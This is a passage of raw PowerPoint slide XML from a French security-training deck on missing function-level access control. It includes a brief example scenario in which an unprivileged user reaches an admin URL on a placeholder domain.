                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>privilégiées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ce</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> type </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’attaque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prenez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> métier des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exposées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>qu’elles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>traitent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>aussi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’impact</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>votre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>réputation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>si</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>devenait</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>publique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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553200"/>
            <a:ext cx="3383280" cy="25908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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scénarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ciblées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Les URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suivantes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessitent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentifié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>droits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://exemple.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://exemple.com/app/admin_getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>existe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentifié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accéder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentifié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilégié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accéder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dernier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
